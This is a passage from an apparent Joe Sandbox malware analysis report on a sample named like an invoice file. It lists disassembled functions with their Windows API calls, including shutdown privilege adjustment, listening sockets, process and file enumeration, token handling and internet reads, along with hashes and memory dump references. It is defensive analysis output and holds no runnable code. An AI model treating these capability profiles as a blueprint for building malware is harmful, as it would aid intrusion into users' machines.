                                                                              • Part of subcall function 00F287E1: GetLastError.KERNEL32 ref: 00F28865
                                                                            • ExitWindowsEx.USER32(?,00000000), ref: 00F351F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                            • String ID: $@$SeShutdownPrivilege
                                                                            • API String ID: 2234035333-194228
                                                                            • Opcode ID: 9451ccf81bf24ae853be861e2bdf0085e4b15a15ce6463bfd07c013764ad9e30
                                                                            • Instruction ID: 1cc384a564c4ecce767480e34c5ac64cc7019d58a0d1fc3106c8cd6962cf134e
                                                                            • Opcode Fuzzy Hash: 9451ccf81bf24ae853be861e2bdf0085e4b15a15ce6463bfd07c013764ad9e30
                                                                            • Instruction Fuzzy Hash: A8012B32B916156BF7287268AC8AFBB7258DB85B71F240460F903E20D2DA51DC05B590
                                                                            Function 00F46283 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00F462DC
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F462EB
                                                                            • bind.WS2_32(00000000,?,00000010), ref: 00F46307
                                                                            • listen.WS2_32(00000000,00000005), ref: 00F46316
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F46330
                                                                            • closesocket.WS2_32(00000000), ref: 00F46344
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                                                            • String ID:
                                                                            • API String ID: 1279440585-0
                                                                            • Opcode ID: 1f6bc309907326292a717a79a88b407daab77b68744bbd362cc48dc42163bf95
                                                                            • Instruction ID: e9465f496db65f2a189ccc08ad2f4c646a530dfe3cc063f79e8596bbace5b440
                                                                            • Opcode Fuzzy Hash: 1f6bc309907326292a717a79a88b407daab77b68744bbd362cc48dc42163bf95
                                                                            • Instruction Fuzzy Hash: 0D21DD356002049FCB00AF64DC45A3EBBE8EF49721F14415AE916E73D2C770AC05EB51
                                                                            Function 00EE5520 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00EF0DB6: std::exception::exception.LIBCMT ref: 00EF0DEC
                                                                              • Part of subcall function 00EF0DB6: __CxxThrowException@8.LIBCMT ref: 00EF0E01
                                                                            • _memmove.LIBCMT ref: 00F20258
                                                                            • _memmove.LIBCMT ref: 00F2036D
                                                                            • _memmove.LIBCMT ref: 00F20414
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                            • String ID:
                                                                            • API String ID: 1300846289-0
                                                                            • Opcode ID: 19de64c72c7374b70ca7e8716d14ac4db754a4f35d215d59387776d0d2c919b8
                                                                            • Instruction ID: c617093a41ba8fd4869d35099677ec592bc845bbd41167cfc825f3cfa830353a
                                                                            • Opcode Fuzzy Hash: 19de64c72c7374b70ca7e8716d14ac4db754a4f35d215d59387776d0d2c919b8
                                                                            • Instruction Fuzzy Hash: 4B02CFB1A00219DBCF04DF64D981ABEBBF5EF44310F14806AE806EB296EB31DD51DB91
                                                                            Function 00ED1287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00ED19FA
                                                                            • GetSysColor.USER32(0000000F), ref: 00ED1A4E
                                                                            • SetBkColor.GDI32(?,00000000), ref: 00ED1A61
                                                                              • Part of subcall function 00ED1290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00ED12D8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ColorDialogNtdllProc_$LongWindow
                                                                            • String ID:
                                                                            • API String ID: 591255283-0
                                                                            • Opcode ID: 27be331744f096c03b91476c6e11b9456af870640bb04343a2e00147f17f22be
                                                                            • Instruction ID: dc708f54f32bf1bd0a75d51a9bb30f02f663c04fd1d458c936437db4283eb779
                                                                            • Opcode Fuzzy Hash: 27be331744f096c03b91476c6e11b9456af870640bb04343a2e00147f17f22be
                                                                            • Instruction Fuzzy Hash: 11A15C71106558BEEA28AB284C54EBF359CDB42356F14115FFA02F53D6CA28DD03B3B2
                                                                            Function 00F3BCBC Relevance: 7.6, APIs: 5, Instructions: 143fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00F3BCE6
                                                                            • _wcscmp.LIBCMT ref: 00F3BD16
                                                                            • _wcscmp.LIBCMT ref: 00F3BD2B
                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00F3BD3C
                                                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00F3BD6C
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 2387731787-0
                                                                            • Opcode ID: dc94bf99a35730530acdf99f0db1f93259fb76a3234c1034fa1d51e8b9d6299e
                                                                            • Instruction ID: 8a6e8664dfff5e57bf795e30254cb7c398a072e8279c10b4e89374ed44ee72e7
                                                                            • Opcode Fuzzy Hash: dc94bf99a35730530acdf99f0db1f93259fb76a3234c1034fa1d51e8b9d6299e
                                                                            • Instruction Fuzzy Hash: 1D51AD75A046029FC718DF28C8A1EAAB3E4EF49320F00465EEA56973A1DB30ED05DB91
                                                                            Function 00F46747 Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00F47D8B: inet_addr.WS2_32(00000000), ref: 00F47DB6
                                                                            • socket.WS2_32(00000002,00000002,00000011), ref: 00F4679E
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F467C7
                                                                            • bind.WS2_32(00000000,?,00000010), ref: 00F46800
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F4680D
                                                                            • closesocket.WS2_32(00000000), ref: 00F46821
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 99427753-0
                                                                            • Opcode ID: 6b159979e0d8d779fb75d44bfd486acc8a7ef30f4661c197900860ca93fcc881
                                                                            • Instruction ID: 66db8a4c81f1d1cf08fd5203e63ad12707c65f79de8eb378b86bb6039d421736
                                                                            • Opcode Fuzzy Hash: 6b159979e0d8d779fb75d44bfd486acc8a7ef30f4661c197900860ca93fcc881
                                                                            • Instruction Fuzzy Hash: BD41C275A00214AFDB10BF68DC86F2E77E8DF09B24F048459FA15AB3D3CA749D019792
                                                                            Function 00F55376 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                            • String ID:
                                                                            • API String ID: 292994002-0
                                                                            • Opcode ID: b74cc6ee8afac74ae50acbafc010d3f4a258ebf873d84f659c1775fb998221c4
                                                                            • Instruction ID: 4e55134f24e6357f8faff0e7f5c7ec3aac2b3a2c42e3c108435235944501b881
                                                                            • Opcode Fuzzy Hash: b74cc6ee8afac74ae50acbafc010d3f4a258ebf873d84f659c1775fb998221c4
                                                                            • Instruction Fuzzy Hash: 35110431700A14AFDB216F26DC64A2E7B9AEF44BA2B444029FE49D7241DB70DC06A6A0
                                                                            Function 00F280A9 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00F280C0
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00F280CA
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00F280D9
                                                                            • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00F280E0
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00F280F6
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 47921759-0
                                                                            • Opcode ID: c2a30cd30549c3daa72a9e202d71ff800bf2c8453f3129a0f2c3a37d00764346
                                                                            • Instruction ID: e03fb1ae6e5cf79c85004e83fe1da9f2970fa065c90964a9c7afc86e6f8f0c06
                                                                            • Opcode Fuzzy Hash: c2a30cd30549c3daa72a9e202d71ff800bf2c8453f3129a0f2c3a37d00764346
                                                                            • Instruction Fuzzy Hash: 8FF06231246318AFEB100FA5EC8DE6B3BACEF497A6B040065FA45C7190CB619C56EA60
                                                                            Function 00F4EE0D Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00F4EE3D
                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00F4EE4B
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00F4EF0B
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00F4EF1A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                                            • String ID:
                                                                            • API String ID: 2576544623-0
                                                                            • Opcode ID: a7b3e06dcc4cceeac924840714025728488650dece1cce7ec300cf7f7f01f31f
                                                                            • Instruction ID: 8d15dab1b9333a2553ecb49bf6e21a4657ae7e9d16114e7dd4509e241fd22c91
                                                                            • Opcode Fuzzy Hash: a7b3e06dcc4cceeac924840714025728488650dece1cce7ec300cf7f7f01f31f
                                                                            • Instruction Fuzzy Hash: 825171715047159FD310EF24DC81E6BBBE8FF94710F10582EF995972A1EB709909CB92
                                                                            Function 00F5C498 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • GetCursorPos.USER32(?), ref: 00F5C4D2
                                                                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F0B9AB,?,?,?,?,?), ref: 00F5C4E7
                                                                            • GetCursorPos.USER32(?), ref: 00F5C534
                                                                            • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F0B9AB,?,?,?), ref: 00F5C56E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                            • String ID:
                                                                            • API String ID: 1423138444-0
                                                                            • Opcode ID: 5dce8d22ee8482fcb9f71147821cb8aa9964c69f72b4a6a4d054acab7eb83e2e
                                                                            • Instruction ID: 6a55275024a669766bf422d477179a3cb7638776713b5552532fea0fcd559e34
                                                                            • Opcode Fuzzy Hash: 5dce8d22ee8482fcb9f71147821cb8aa9964c69f72b4a6a4d054acab7eb83e2e
                                                                            • Instruction Fuzzy Hash: E831A535500118AFCF16CF98C858EEA7BF5EB09721F484069FE068B261D731AD58EBE4
                                                                            Function 00F285B0 Relevance: 6.1, APIs: 4, Instructions: 61processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00F285E2
                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00F285E9
                                                                            • CloseHandle.KERNEL32(00000004), ref: 00F28603
                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F28632
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                                            • String ID:
                                                                            • API String ID: 2621361867-0
                                                                            • Opcode ID: 10adc6eca38d213bf2ca67139e86332b971a8e90be31f3ab6357cc8d64cf4ce3
                                                                            • Instruction ID: 4c8c30a46e5e30b427d1f1dcbf8420177987a9d63be839277acc39558dff407f
                                                                            • Opcode Fuzzy Hash: 10adc6eca38d213bf2ca67139e86332b971a8e90be31f3ab6357cc8d64cf4ce3
                                                                            • Instruction Fuzzy Hash: DE114C7250124DAFDF018FA4ED48AEE7FA9EF08355F044065FE05A2160C7718D65EB20
                                                                            Function 00ED1290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED2612: GetWindowLongW.USER32(?,000000EB), ref: 00ED2623
                                                                            • NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00ED12D8
                                                                            • GetClientRect.USER32(?,?), ref: 00F0B5FB
                                                                            • GetCursorPos.USER32(?), ref: 00F0B605
                                                                            • ScreenToClient.USER32(?,?), ref: 00F0B610
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                                                            • String ID:
                                                                            • API String ID: 1010295502-0
                                                                            • Opcode ID: dff3787c5d1ebf3c45cab1566b59ba167b9358ecf8df62d9cb5c708480ace762
                                                                            • Instruction ID: 11b9a63324127a8c4f51b3547d72df6f4ef94b6285b519a437a87c4c60a4b3a7
                                                                            • Opcode Fuzzy Hash: dff3787c5d1ebf3c45cab1566b59ba167b9358ecf8df62d9cb5c708480ace762
                                                                            • Instruction Fuzzy Hash: A8112835A0011DBBCB10EF98D8859EE77B9EB05301F500496FA01E7251D731AA56ABA5
                                                                            Function 00F2E616 Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 561stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00F2E628
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: lstrlen
                                                                            • String ID: ($|
                                                                            • API String ID: 1659193697-1631851259
                                                                            • Opcode ID: 707b7f7998ffb85bb736ed7f14b8be5a3c5538d509fa679957fa06d8752cfb00
                                                                            • Instruction ID: 86331dfbefa13cdf97c5268a85c21f9fdaad6af4a3d760d1a532cad739c2af9a
                                                                            • Opcode Fuzzy Hash: 707b7f7998ffb85bb736ed7f14b8be5a3c5538d509fa679957fa06d8752cfb00
                                                                            • Instruction Fuzzy Hash: 9E323775A007159FDB28CF59D481AAAB7F0FF48320B25C46EE89ADB3A1D770E941CB40
                                                                            Function 00F422EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00F4180A,00000000), ref: 00F423E1
                                                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00F42418
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
